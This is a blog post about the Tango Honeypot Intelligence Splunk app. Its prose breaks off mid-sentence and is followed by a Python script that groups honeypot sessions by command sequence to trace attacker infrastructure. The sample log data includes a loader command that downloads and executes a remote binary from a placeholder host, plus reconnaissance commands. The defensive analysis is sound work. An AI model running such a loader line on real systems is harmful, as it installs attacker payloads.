The Splunk app, Tango Honeypot Intelligence, which I had the pleasure of working on for a while, has finally been made official. Please check it out if you have some time; I would love some feedback.
In this post, we'll cover some searches that will help us identify the infrastructure that the attackers are using. We'll do this by grouping the attackers together based on the commands they enter during each session. By doing this, we can assume that the attacking IP addresses are somehow used
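The grouping idea above, carried out in plain Python rather than SPL, as an added example that is not part of the original post or of the Tango app. It assumes Cowrie-style JSON-lines honeypot events (field names `eventid`, `session`, `src_ip`, `input` are an assumption), clusters sessions by a hash of their ordered command list, and reports which clusters were driven by more than one source IP, together with any download hosts named in the commands. The log lines are constructed for the example.

```python
import hashlib
import json
import re

# Constructed honeypot events in a Cowrie-style JSON-lines layout (assumed
# field names: eventid, session, src_ip, input). Not real data and not
# output from the Tango Honeypot Intelligence app.
SAMPLE_EVENTS = """
{"eventid": "cowrie.command.input", "session": "s1", "src_ip": "203.0.113.10", "input": "uname -a"}
{"eventid": "cowrie.command.input", "session": "s1", "src_ip": "203.0.113.10", "input": "cat /proc/cpuinfo | grep name | wc -l"}
{"eventid": "cowrie.command.input", "session": "s1", "src_ip": "203.0.113.10", "input": "cd /tmp; wget http://198.51.100.5/x86; chmod +x x86; ./x86"}
{"eventid": "cowrie.command.input", "session": "s2", "src_ip": "203.0.113.77", "input": "uname  -a"}
{"eventid": "cowrie.command.input", "session": "s2", "src_ip": "203.0.113.77", "input": "cat /proc/cpuinfo | grep name | wc -l"}
{"eventid": "cowrie.command.input", "session": "s2", "src_ip": "203.0.113.77", "input": "cd /tmp; wget http://198.51.100.5/x86; chmod +x x86; ./x86"}
{"eventid": "cowrie.command.input", "session": "s3", "src_ip": "198.51.100.23", "input": "uname -a"}
{"eventid": "cowrie.command.input", "session": "s3", "src_ip": "198.51.100.23", "input": "ls -la /root"}
{"eventid": "cowrie.login.success", "session": "s4", "src_ip": "192.0.2.9", "username": "root", "password": "123456"}
"""

# Host part of any http(s) URL inside a command line (wget/curl payload fetches).
URL_HOST_RE = re.compile(r"https?://([^/\s;'\"]+)")


def parse_sessions(text):
    """Collect the ordered command list and source IP for each session."""
    sessions = {}
    for line in text.strip().splitlines():
        ev = json.loads(line)
        if ev.get("eventid") != "cowrie.command.input":
            continue  # logins, file downloads etc. carry no command text
        s = sessions.setdefault(ev["session"], {"src_ip": ev["src_ip"], "commands": []})
        s["commands"].append(ev["input"])
    return sessions


def fingerprint(commands):
    """Order-sensitive hash of the command sequence, whitespace-normalised
    so that `uname  -a` and `uname -a` land in the same group."""
    normalised = "\n".join(" ".join(c.split()) for c in commands)
    return hashlib.sha256(normalised.encode()).hexdigest()


def extract_hosts(commands):
    """Download hosts referenced by the commands: the attacker's own infrastructure."""
    hosts = set()
    for c in commands:
        hosts.update(URL_HOST_RE.findall(c))
    return sorted(hosts)


def cluster_by_commands(text):
    """Group sessions that ran the same command sequence; return fingerprint -> cluster."""
    clusters = {}
    for s in parse_sessions(text).values():
        fp = fingerprint(s["commands"])
        c = clusters.setdefault(fp, {
            "commands": s["commands"],
            "src_ips": set(),
            "sessions": 0,
            "hosts": extract_hosts(s["commands"]),
        })
        c["src_ips"].add(s["src_ip"])
        c["sessions"] += 1
    for c in clusters.values():
        c["src_ips"] = sorted(c["src_ips"])
    return clusters


def shared_infrastructure(clusters, min_ips=2):
    """Clusters driven from at least `min_ips` distinct source addresses:
    the same script run from several hosts suggests one operator or one botnet."""
    return [c for c in clusters.values() if len(c["src_ips"]) >= min_ips]


if __name__ == "__main__":
    for c in shared_infrastructure(cluster_by_commands(SAMPLE_EVENTS)):
        print(f"{c['sessions']} sessions from {c['src_ips']}, payload hosts {c['hosts']}")
        for cmd in c["commands"]:
            print("   ", cmd)
```

The fingerprint is deliberately order-sensitive: two scripts that run the same commands in a different order are usually different tooling. For a looser match, sort the normalised commands before hashing, or strip URLs and filenames so that the same loader pointed at a new staging server still groups with its predecessors.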